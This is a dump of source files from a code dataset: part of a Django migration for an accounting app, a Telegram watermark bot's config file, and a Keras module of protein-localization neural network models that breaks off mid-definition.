'parent_hierarchique': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.AccountCategory']", 'null': 'True', 'blank': 'True'})
},
u'accounting_core.accountingyear': {
'Meta': {'object_name': 'AccountingYear'},
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'end_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'start_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'0_preparing'", 'max_length': '255'}),
'subvention_deadline': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
u'accounting_core.costcenter': {
'Meta': {'unique_together': "(('name', 'accounting_year'), ('account_number', 'accounting_year'))", 'object_name': 'CostCenter'},
'account_number': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'accounting_year': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.AccountingYear']"}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['units.Unit']"})
},
u'accounting_main.accountingerror': {
'Meta': {'object_name': 'AccountingError'},
'accounting_year': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.AccountingYear']"}),
'costcenter': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.CostCenter']"}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'initial_remark': ('django.db.models.fields.TextField', [], {}),
'linked_line': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_main.AccountingLine']", 'null': 'True', 'blank': 'True'}),
'linked_line_cache': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'0_drafting'", 'max_length': '255'}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['units.Unit']"})
},
u'accounting_main.accountingerrorlogging': {
'Meta': {'object_name': 'AccountingErrorLogging'},
'extra_data': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'logs'", 'to': u"orm['accounting_main.AccountingError']"}),
'what': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'when': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'who': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['users.TruffeUser']"})
},
u'accounting_main.accountingerrormessage': {
'Meta': {'object_name': 'AccountingErrorMessage'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['users.TruffeUser']"}),
'error': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_main.AccountingError']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'when': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
u'accounting_main.accountingline': {
'Meta': {'object_name': 'AccountingLine'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.Account']"}),
'accounting_year': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.AccountingYear']"}),
'costcenter': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.CostCenter']"}),
'current_sum': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'date': ('django.db.models.fields.DateField', [], {}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'document_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'output': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'0_imported'", 'max_length': '255'}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'tva': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['units.Unit']"})
},
u'accounting_main.accountinglinelogging': {
'Meta': {'object_name': 'AccountingLineLogging'},
'extra_data': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'logs'", 'to': u"orm['accounting_main.AccountingLine']"}),
'what': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'when': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'who': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['users.TruffeUser']"})
},
u'accounting_main.budget': {
'Meta': {'object_name': 'Budget'},
'accounting_year': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.AccountingYear']"}),
'costcenter': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.CostCenter']"}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'0_draft'", 'max_length': '255'}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['units.Unit']"})
},
u'accounting_main.budgetline': {
'Meta': {'object_name': 'BudgetLine'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_core.Account']"}),
'amount': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'budget': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounting_main.Budget']"}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'accounting_main.budgetlogging': {
'Meta': {'object_name': 'BudgetLogging'},
'extra_data': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'logs'", 'to': u"orm['accounting_main.Budget']"}),
'what': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'when': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'who': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['users.TruffeUser']"})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'units.unit': {
'Meta': {'object_name': 'Unit'},
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'id_epfl': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'is_commission': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_equipe': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'parent_hierarchique': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['units.Unit']", 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'users.truffeuser': {
'Meta': {'object_name': 'TruffeUser'},
'adresse': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'body': ('django.db.models.fields.CharField', [], {'default': "'.'", 'max_length': '1'}),
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '255'}),
'email_perso': ('django.db.models.fields.EmailField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
'iban_ou_ccp': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'mobile': ('django.db.models.fields.CharField', [], {'max_length': '25', 'blank': 'True'}),
'nom_banque': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
}
}
complete_apps = ['accounting_main']
| 80.949749
| 195
| 0.574337
|
794d8e12a242f72a52dbb030f118ea36e4bdd16c
| 1,508
|
py
|
Python
|
configs.py
|
AppleBotz/WM_bot
|
36311af327f24126b0d202f5e5b16145bb1a00d3
|
[
"MIT"
] | null | null | null |
configs.py
|
AppleBotz/WM_bot
|
36311af327f24126b0d202f5e5b16145bb1a00d3
|
[
"MIT"
] | null | null | null |
configs.py
|
AppleBotz/WM_bot
|
36311af327f24126b0d202f5e5b16145bb1a00d3
|
[
"MIT"
] | null | null | null |
# (c) @AbirHasan2005
# Don't Forget That I Made This!
# So Give Credits!
import os
class Config(object):
BOT_TOKEN = os.environ.get("BOT_TOKEN")
API_ID = int(os.environ.get("API_ID", 12345))
API_HASH = os.environ.get("API_HASH")
STREAMTAPE_API_PASS = os.environ.get("STREAMTAPE_API_PASS", "NoNeed")
STREAMTAPE_API_USERNAME = os.environ.get("STREAMTAPE_API_USERNAME", "NoNeed")
LOG_CHANNEL = int(os.environ.get("LOG_CHANNEL"))
UPDATES_CHANNEL = os.environ.get("UPDATES_CHANNEL", None)
DOWN_PATH = os.environ.get("DOWN_PATH", "./downloads")
PRESET = os.environ.get("PRESET", "ultrafast")
OWNER_ID = int(os.environ.get("OWNER_ID", 5295523409))
CAPTION = "By @BLVCKCARDS's"
BOT_USERNAME = os.environ.get("BOT_USERNAME", "WMCards_Videobot")
DATABASE_URL = os.environ.get("DATABASE_URL")
BROADCAST_AS_COPY = bool(os.environ.get("BROADCAST_AS_COPY", False))
ALLOW_UPLOAD_TO_STREAMTAPE = bool(os.environ.get("ALLOW_UPLOAD_TO_STREAMTAPE", True))
USAGE_WATERMARK_ADDER = """
Hi, I am Video Watermark Adder Bot!
**How to Added Watermark to a Video?**
**Usage:** First Send a JPG Image/Logo, then send any Video. Better add watermark to a MP4 or MKV Video.
__Note: I can only process one video at a time. As my server is Heroku, my health is not good. If you have any issues with Adding Watermark to a Video, then please Report at [Support Group](https://t.me/SharkUserbot).__
Desgined by @BLVCKCARDS's
"""
PROGRESS = """
Percentage : {0}%
Done ✅: {1}
Total 🌀: {2}
Speed 🚀: {3}/s
ETA 🕰: {4}
"""
| 35.069767
| 219
| 0.728117
|
794d8e8ed8437f9ed74a7fa971afe6b7f787b607
| 32,929
|
py
|
Python
|
utils/models.py
|
ClaudiaRaffaelli/Protein-subcellular-localization
|
38a40c7389ee717954c254114959368223a55e43
|
[
"MIT"
] | null | null | null |
utils/models.py
|
ClaudiaRaffaelli/Protein-subcellular-localization
|
38a40c7389ee717954c254114959368223a55e43
|
[
"MIT"
] | null | null | null |
utils/models.py
|
ClaudiaRaffaelli/Protein-subcellular-localization
|
38a40c7389ee717954c254114959368223a55e43
|
[
"MIT"
] | 1
|
2021-08-25T07:50:43.000Z
|
2021-08-25T07:50:43.000Z
|
import numpy as np
import tensorflow as tf
from tensorflow.keras.models import Sequential
from tensorflow.keras import layers, optimizers
from tensorflow import keras
import matplotlib.pyplot as plt
import itertools
from sklearn.metrics import classification_report, confusion_matrix, matthews_corrcoef
import math
class Attention(tf.keras.layers.Layer):
""" Implementing a layer that does attention according to Bahdanau style """
def __init__(self, units):
super(Attention, self).__init__()
# W1 weight of the previously hidden state(hidden_size x hidden_size)
self.W1 = tf.keras.layers.Dense(units)
# W2 weight for all the encoder hidden states
self.W2 = tf.keras.layers.Dense(units)
self.V = tf.keras.layers.Dense(1)
def call(self, inputs, hidden):
# 'hidden' (h_t) is expanded over the time axis to prepare it for the addition
# that follows. hidden will always be the last hidden state of the RNN.
# (in seq2seq in would have been the current state of the decoder step)
# 'features' (h_s) are all the hidden states of the encoder.
hidden_with_time_axis = tf.expand_dims(hidden, 1)
# Bahdanau additive style to compute the score:
# score = v_a * tanh(W_1*h_t + W_2*h_s)
score = tf.nn.tanh(self.W1(inputs) + self.W2(hidden_with_time_axis))
attention_weights = tf.nn.softmax(self.V(score), axis=1)
context_vector = attention_weights * inputs
context_vector = tf.reduce_sum(context_vector, axis=1)
return context_vector, attention_weights
class CustomModels:
def __init__(self, seq_len, n_feat, n_hid, n_class, lr, drop_prob, n_filt=None, drop_hid=None, random_search=False,
n_membrane_class=3, batch_size=None):
"""
Hyperparameters of the network:
:param seq_len: length of sequence
:param n_feat: number of features encoded
:param n_hid: number of hidden neurons. In can be an integer, or an hp.Int, that is a range used during optimization.
:param n_class: number of classes to output
:param lr: learning rate. In can be a float, or an hp.Float, that is a range used during optimization.
:param drop_prob: hidden neurons dropout probability. In can be a float, or an hp.Float, that is a range used during optimization.
:param n_filt: (optional) filters number. In can be an int, or an hp.Int, that is a range used during optimization.
:param drop_hid: (optional) dropout of hidden neurons
"""
self.seq_len = seq_len
self.n_feat = n_feat
self.n_hid = n_hid
self.n_class = n_class
self.lr = lr
self.drop_prob = drop_prob
self.n_filt = n_filt
self.drop_hid = drop_hid
self.model = None
self.confusion_mat = None
self.random_search = random_search
self.n_membrane_class = n_membrane_class
self.batch_size = batch_size
self.classes_subcellular = ['Cell membrane', 'Cytoplasm', 'ER', 'Golgi apparatus', 'Lysosome + Vacuole',
'Mitochondrion', 'Nucleus', 'Peroxisome', 'Plastid', 'Extracellular']
self.classes_membrane = ['Membrane', 'Soluble', 'Unknown']
def create_FFN(self, X_train=None, y_train=None, X_val=None, y_val=None, params=None):
"""
Building the network by defining its architecture: input layer, dense layer, output layer
:param hp: optional hyerparameter container. A HyperParameters instance contains information about both the
search space and the current values of each hyperparameter.
"""
if self.random_search:
self.drop_prob = params['drop_prob']
self.n_hid = params['n_hid']
self.lr = params['lr']
# Define the layers of the network
inputs = keras.Input(shape=(self.seq_len, self.n_feat))
x = layers.Flatten()(inputs)
x = layers.Dense(units=self.n_hid, activation='relu')(x)
x = layers.Dropout(self.drop_prob)(x)
l_out_subcellular = layers.Dense(self.n_class, activation="softmax", name="subcellular")(x)
l_out_membrane = layers.Dense(self.n_membrane_class, activation="softmax", name="membrane")(x)
self.model = keras.Model(inputs, [l_out_subcellular, l_out_membrane])
# Calculate the prediction and network loss for the training set and update the network weights:
self.model.compile(loss=['categorical_crossentropy', 'categorical_crossentropy'],
optimizer=optimizers.Adam(learning_rate=self.lr, clipnorm=3), metrics=['accuracy'])
# with clipnorm the gradients will be clipped when their L2 norm exceeds this value.
if not self.random_search:
return self.model
else:
history = self.model.fit(X_train, [y_train[0], y_train[1]], epochs=120, batch_size=params['batch_size'],
validation_data=(X_val, [y_val[0], y_val[1]]), shuffle=True)
return history, self.model
def create_CNN(self, X_train=None, y_train=None, X_val=None, y_val=None, params=None):
"""
Building the network by defining its architecture: input layer, two convolutional layers with max pooling,
a dense layer and an output layer.
:param X_train: (optional) train features for random search
X_val: (optional) validation features for random search
y_train: (optional) train labels for random search
y_val: (optional) validation labels for random search
params: optional hyerparameter container. A HyperParameters instance contains information about both the
search space and the current values of each hyperparameter.
"""
if self.random_search:
self.drop_prob = params['drop_prob']
self.n_hid = params['n_hid']
self.lr = params['lr']
self.n_filt = params['n_filt']
# Build model
inputs = keras.Input(shape=(self.seq_len, self.n_feat))
l_permute = layers.Permute((2, 1))(inputs)
l_conv_a = layers.Conv1D(self.n_filt, 3, strides=1, padding="same", activation="relu",
data_format='channels_first') \
(l_permute)
l_conv_b = layers.Conv1D(self.n_filt, 5, strides=1, padding="same", activation="relu",
data_format='channels_first') \
(l_permute)
l_conc = tf.keras.layers.Concatenate(axis=1)([l_conv_a, l_conv_b])
l_conv_final = layers.Conv1D(self.n_filt * 2, 3, strides=1, padding="same", activation="relu",
data_format='channels_first')(l_conc)
l_reshu = layers.Permute((2, 1))(l_conv_final)
final_max_pool = layers.MaxPooling1D(5)(l_reshu)
final_max_pool = layers.Flatten()(final_max_pool)
l_dense = layers.Dense(self.n_hid, activation="relu")(final_max_pool)
l_dense = layers.Dropout(self.drop_prob)(l_dense)
l_out_subcellular = layers.Dense(self.n_class, activation="softmax", name="subcellular")(l_dense)
l_out_membrane = layers.Dense(self.n_membrane_class, activation="softmax", name="membrane")(l_dense)
self.model = keras.Model(inputs, [l_out_subcellular, l_out_membrane])
# with clipnorm the gradients will be clipped when their L2 norm exceeds this value.
self.model.compile(loss=['categorical_crossentropy', 'categorical_crossentropy'],
optimizer=optimizers.Adam(learning_rate=self.lr, clipnorm=3), metrics=['accuracy'])
if not self.random_search:
return self.model
else:
history = self.model.fit(X_train, [y_train[0], y_train[1]], epochs=120, batch_size=params['batch_size'],
validation_data=(X_val, [y_val[0], y_val[1]]), shuffle=True)
return history, self.model
def create_LSTM(self, X_train=None, y_train=None, X_val=None, y_val=None, params=None):
"""
Building the network by defining its architecture: input layer, a bidirectional LSTM, a dense layer and an
output layer
:param X_train: (optional) train features for random search
X_val: (optional) validation features for random search
y_train: (optional) train labels for random search
y_val: (optional) validation labels for random search
params: optional hyerparameter container. A HyperParameters instance contains information about both the
search space and the current values of each hyperparameter.
"""
if self.random_search:
self.drop_prob = params['drop_prob']
self.n_hid = params['n_hid']
self.lr = params['lr']
# Build model defining the layers
# Define input
l_input = keras.Input(shape=(self.seq_len, self.n_feat))
# Bidirectional LSTM layer, taking only the last hidden state (only_return_final)
l_fwd = layers.LSTM(units=self.n_hid, activation="tanh", return_sequences=False)(l_input)
l_bwd = layers.LSTM(units=self.n_hid, activation="tanh", return_sequences=False, go_backwards=True)(l_input)
# Concatenate both layers
l_conc_lstm = tf.keras.layers.Concatenate(axis=1)([l_fwd, l_bwd])
# Dense layer with ReLu activation function
l_dense = layers.Dense(self.n_hid * 2, activation="relu")(l_conc_lstm)
# Output layer with a Softmax activation function. Note that we include a dropout layer
l_dropout = layers.Dropout(self.drop_prob)(l_dense)
l_out_subcellular = layers.Dense(self.n_class, activation="softmax", name="subcellular")(l_dropout)
l_out_membrane = layers.Dense(self.n_membrane_class, activation="softmax", name="membrane")(l_dropout)
self.model = keras.Model(l_input, [l_out_subcellular, l_out_membrane])
# with clipnorm the gradients will be clipped when their L2 norm exceeds this value.
self.model.compile(loss=['categorical_crossentropy', 'categorical_crossentropy'],
optimizer=optimizers.Adam(learning_rate=self.lr, clipnorm=3), metrics=['accuracy'])
if not self.random_search:
return self.model
else:
history = self.model.fit(X_train, [y_train[0], y_train[1]], epochs=120, batch_size=params['batch_size'],
validation_data=(X_val, [y_val[0], y_val[1]]), shuffle=True)
return history, self.model
def create_CNN_LSTM(self, X_train=None, y_train=None, X_val=None, y_val=None, params=None):
"""
Building the network by defining its architecture: input layer, two convolutional layers, a bidirectional LSTM,
a dense layer and an output layer
:param X_train: (optional) train features for random search
X_val: (optional) validation features for random search
y_train: (optional) train labels for random search
y_val: (optional) validation labels for random search
params: optional hyerparameter container. A HyperParameters instance contains information about both the
search space and the current values of each hyperparameter.
"""
if self.random_search:
self.drop_prob = params['drop_prob']
self.n_hid = params['n_hid']
self.lr = params['lr']
self.n_filt = params['n_filt']
# Build model defining the layers
# Define input
l_input = keras.Input(shape=(self.seq_len, self.n_feat))
l_permute = layers.Permute((2, 1))(l_input)
# Convolutional layers with filter size 3 and 5
l_conv_a = layers.Conv1D(self.n_filt, 3, strides=1, padding="same", activation="relu",
data_format='channels_first')(
l_permute)
l_conv_b = layers.Conv1D(self.n_filt, 5, strides=1, padding="same", activation="relu",
data_format='channels_first')(
l_permute)
# The output of the two convolution is concatenated
l_conc = tf.keras.layers.Concatenate(axis=1)([l_conv_a, l_conv_b])
# Building a second CNN layer
l_conv_final = layers.Conv1D(
self.n_filt * 2, 3, strides=1, padding="same", activation="relu", data_format='channels_first')(l_conc)
# Second permute layer
l_reshu = layers.Permute((2, 1))(l_conv_final)
# Bidirectional LSTM layer, taking only the last hidden state (only_return_final)
l_fwd = layers.LSTM(units=self.n_hid, activation="tanh", return_sequences=False)(l_reshu)
l_bwd = layers.LSTM(units=self.n_hid, activation="tanh", return_sequences=False, go_backwards=True)(l_reshu)
# Concatenate both layers
l_conc_lstm = tf.keras.layers.Concatenate(axis=1)([l_fwd, l_bwd])
# Dense layer with ReLu activation function
l_dense = layers.Dense(self.n_hid * 2, activation="relu")(l_conc_lstm)
# Output layer with a Softmax activation function. Note that we include a dropout layer
l_dropout = layers.Dropout(self.drop_prob)(l_dense)
l_out_subcellular = layers.Dense(self.n_class, activation="softmax", name="subcellular")(l_dropout)
l_out_membrane = layers.Dense(self.n_membrane_class, activation="softmax", name="membrane")(l_dropout)
self.model = keras.Model(l_input, [l_out_subcellular, l_out_membrane])
# with clipnorm the gradients will be clipped when their L2 norm exceeds this value.
self.model.compile(loss=['categorical_crossentropy', 'categorical_crossentropy'],
optimizer=optimizers.Adam(learning_rate=self.lr, clipnorm=3), metrics=['accuracy'])
if not self.random_search:
return self.model
else:
history = self.model.fit(X_train, [y_train[0], y_train[1]], epochs=120, batch_size=params['batch_size'],
validation_data=(X_val, [y_val[0], y_val[1]]), shuffle=True)
return history, self.model
def create_LSTM_Attention(self, X_train=None, y_train=None, X_val=None, y_val=None, params=None):
"""
Building the network by defining its architecture: an input layer, a bidirectional LSTM, an attention layer,
a dense layer and an output layer.
:param X_train: (optional) train features for random search
X_val: (optional) validation features for random search
y_train: (optional) train labels for random search
y_val: (optional) validation labels for random search
params: optional hyerparameter container. A HyperParameters instance contains information about both the
search space and the current values of each hyperparameter.
"""
if self.random_search:
self.drop_prob = params['drop_prob']
self.n_hid = params['n_hid']
self.lr = params['lr']
# Build model
inputs = keras.Input(shape=(self.seq_len, self.n_feat))
# encoders LSTM
l_lstm, forward_h, forward_c, backward_h, backward_c = layers.Bidirectional \
(layers.LSTM(self.n_hid, dropout=self.drop_prob, return_sequences=True, return_state=True,
activation="tanh"))(inputs)
state_h = layers.Concatenate()([forward_h, backward_h])
state_c = layers.Concatenate()([forward_c, backward_c])
# Set up the attention layer
context_vector, self.attention_weights = Attention(self.n_hid * 2)(inputs=l_lstm, hidden=state_h)
l_drop = layers.Dropout(self.drop_prob)(context_vector)
l_out_subcellular = layers.Dense(self.n_class, activation="softmax", name="subcellular")(l_drop)
l_out_membrane = layers.Dense(self.n_membrane_class, activation="softmax", name="membrane")(l_drop)
self.model = keras.Model(inputs, [l_out_subcellular, l_out_membrane])
# with clipnorm the gradients will be clipped when their L2 norm exceeds this value.
self.model.compile(loss=['categorical_crossentropy', 'categorical_crossentropy'],
optimizer=optimizers.Adam(learning_rate=self.lr, clipnorm=3), metrics=['accuracy'])
if not self.random_search:
return self.model
else:
history = self.model.fit(X_train, [y_train[0], y_train[1]], epochs=120, batch_size=params['batch_size'],
validation_data=(X_val, [y_val[0], y_val[1]]), shuffle=True)
return history, self.model
def create_CNN_LSTM_Attention(self, X_train=None, y_train=None, X_val=None, y_val=None, params=None):
"""
Building the network by defining its architecture: an input layer, two convolutional layers, a bidirectional
LSTM, an attention layer, a dense layer and an output layer.
:param X_train: (optional) train features for random search
X_val: (optional) validation features for random search
y_train: (optional) train labels for random search
y_val: (optional) validation labels for random search
params: optional hyerparameter container. A HyperParameters instance contains information about both the
search space and the current values of each hyperparameter.
"""
if self.random_search:
self.drop_prob = params['drop_prob']
self.n_hid = params['n_hid']
self.lr = params['lr']
self.n_filt = params['n_filt']
# Build model
inputs = keras.Input(shape=(self.seq_len, self.n_feat))
l_permute = layers.Permute((2, 1))(inputs)
l_conv_a = layers.Conv1D(self.n_filt, 3, strides=1, padding="same", activation="relu",
data_format='channels_first')(l_permute)
l_conv_b = layers.Conv1D(self.n_filt, 5, strides=1, padding="same", activation="relu",
data_format='channels_first')(l_permute)
l_conc = tf.keras.layers.Concatenate(axis=1)([l_conv_a, l_conv_b])
l_conv_final = layers.Conv1D(
self.n_filt * 2, 3, strides=1, padding="same", activation="relu", data_format='channels_first')(l_conc)
l_reshu = layers.Permute((2, 1))(l_conv_final)
# encoders LSTM
l_lstm, forward_h, forward_c, backward_h, backward_c = layers.Bidirectional \
(layers.LSTM(self.n_hid, dropout=self.drop_prob, return_sequences=True, return_state=True,
activation="tanh"))(l_reshu)
state_h = layers.Concatenate()([forward_h, backward_h])
state_c = layers.Concatenate()([forward_c, backward_c])
# Set up the attention layer
context_vector, self.attention_weights = Attention(self.n_hid * 2)(inputs=l_lstm, hidden=state_h)
l_dense = layers.Dense(self.n_hid * 2, activation="relu")(context_vector)
l_drop = layers.Dropout(self.drop_prob)(l_dense)
l_out_subcellular = layers.Dense(self.n_class, activation="softmax", name="subcellular")(l_drop)
l_out_membrane = layers.Dense(self.n_membrane_class, activation="softmax", name="membrane")(l_drop)
self.model = keras.Model(inputs, [l_out_subcellular, l_out_membrane])
# with clipnorm the gradients will be clipped when their L2 norm exceeds this value.
self.model.compile(loss=['categorical_crossentropy', 'categorical_crossentropy'],
optimizer=optimizers.Adam(learning_rate=self.lr, clipnorm=3), metrics=['accuracy'])
if not self.random_search:
return self.model
else:
history = self.model.fit(X_train, [y_train[0], y_train[1]], epochs=120, batch_size=params['batch_size'],
validation_data=(X_val, [y_val[0], y_val[1]]), shuffle=True)
return history, self.model
def create_CNN_LSTM_Attention_complete(self, hp=None):
"""
Building the network by defining its architecture: an input layer, two convolutional layers, a bidirectional
LSTM, an attention layer, a dense layer and an output layer.
:param hp: optional hyerparameter container. A HyperParameters instance contains information about both the
search space and the current values of each hyperparameter.
"""
# Build model
inputs = keras.Input(shape=(self.seq_len, self.n_feat))
l_drop1 = layers.Dropout(self.drop_prob)(inputs)
l_permute = layers.Permute((2, 1))(l_drop1)
# Size of convolutional layers
f_size_a = 1
f_size_b = 3
f_size_c = 5
f_size_d = 9
f_size_e = 15
f_size_f = 21
# initialization with random orthogonal weights using sqrt(2) for rectified linear units as scaling factor
initializer = tf.keras.initializers.Orthogonal(gain=math.sqrt(2))
l_conv_a = layers.Conv1D(self.n_filt, f_size_a, strides=1, padding="same", kernel_initializer=initializer,
activation="relu", data_format='channels_first')(l_permute)
l_conv_b = layers.Conv1D(self.n_filt, f_size_b, strides=1, padding="same", kernel_initializer=initializer,
activation="relu", data_format='channels_first')(l_permute)
l_conv_c = layers.Conv1D(self.n_filt, f_size_c, strides=1, padding="same", kernel_initializer=initializer,
activation="relu", data_format='channels_first')(l_permute)
l_conv_d = layers.Conv1D(self.n_filt, f_size_d, strides=1, padding="same", kernel_initializer=initializer,
activation="relu", data_format='channels_first')(l_permute)
l_conv_e = layers.Conv1D(self.n_filt, f_size_e, strides=1, padding="same", kernel_initializer=initializer,
activation="relu", data_format='channels_first')(l_permute)
l_conv_f = layers.Conv1D(self.n_filt, f_size_f, strides=1, padding="same", kernel_initializer=initializer,
activation="relu", data_format='channels_first')(l_permute)
# concatenate all convolutional layers
l_conc = tf.keras.layers.Concatenate(axis=1)([l_conv_a, l_conv_b, l_conv_c, l_conv_d, l_conv_e, l_conv_f])
l_reshu = layers.Permute((2, 1))(l_conc)
l_conv_final = layers.Conv1D(
